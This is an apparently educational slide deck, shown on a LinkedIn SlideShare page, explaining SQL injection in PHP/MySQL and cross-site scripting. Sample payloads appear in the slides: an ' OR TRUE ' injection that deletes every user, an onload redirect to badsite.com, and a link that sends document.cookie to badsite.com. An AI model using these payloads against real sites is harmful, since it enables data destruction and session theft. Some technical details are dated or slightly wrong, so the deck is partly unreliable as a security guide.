O slideshow foi denunciado.
Utilizamos seu perfil e dados de atividades no LinkedIn para personalizar e exibir anúncios mais relevantes. Altere suas preferências de anúncios quando desejar.

Hacking - Web based attacks

1.157 visualizações

Publicada em

Publicada em: Educação, Tecnologia
  • Seja o primeiro a comentar

  • Seja a primeira pessoa a gostar disto

Hacking - Web based attacks

  1. 2. WEB-SERVERS & DATABASES <ul><li>Apache web-server and MySQL database server are very commonly used </li></ul><ul><li>Database access is in the form of queries </li></ul><ul><li>Ex: Select * from users where name='xyz'; </li></ul><ul><li>PHP contains functions to query MySQL databases </li></ul>
  2. 3. PHP & MySQL <ul><li>Consider a hypothetical scenario where user can delete his account by specifying his username in a textbox. </li></ul><ul><li>Typical PHP statement for querying a database - $sql = &quot;DELETE * from users where username='$user' &quot; ; </li></ul><ul><li>mysql_query($sql); </li></ul><ul><li>What would happen if I enter the following in the textbox? ' OR TRUE ' </li></ul>
  3. 4. SQL INJECTION <ul><li>$sql = &quot;DELETE * from users where username= ' ' OR TRUE ' ' &quot; ; </li></ul><ul><li>All users in the table will be deleted!!! </li></ul><ul><li>Solution - mysql_real_escape_string() </li></ul><ul><li>“ Escapes” the single quotes, double quotes and other special characters by prefixing a backslash ( ) to each of them </li></ul><ul><li>In this case, query will become </li></ul><ul><li>$sql = &quot;DELETE * from users where username= ' ' OR TRUE ' ' &quot; ; </li></ul>
  4. 5. Cross Site Scripting (XSS) <ul><li>Affects clients more than servers </li></ul><ul><li>Eg- </li></ul><ul><li><img src= ”http://sun.com/images/xyz.jpg” onload=”window.location= ’http://badsite.com/’ ” /> </li></ul><ul><li>From next time onwards, as soon as the image finishes loading, the browser will be redirected to the bad site. </li></ul>
  5. 6. A more serious XSS attack <ul><li>Provide a user with a link which will be of the following form: </li></ul><ul><li><a href=“ goodsite.com ” onmousedown = “window.location=‘ badsite.com&cookie=document.cookie ’”>Link to Good Site</a> </li></ul><ul><li>Store the stolen cookie in a database and access vital information </li></ul>
  6. 7. Remedy <ul><li>First kind can be avoided by proper filtering </li></ul><ul><li>Second one can be avoided by increasing awareness about such possibilities </li></ul>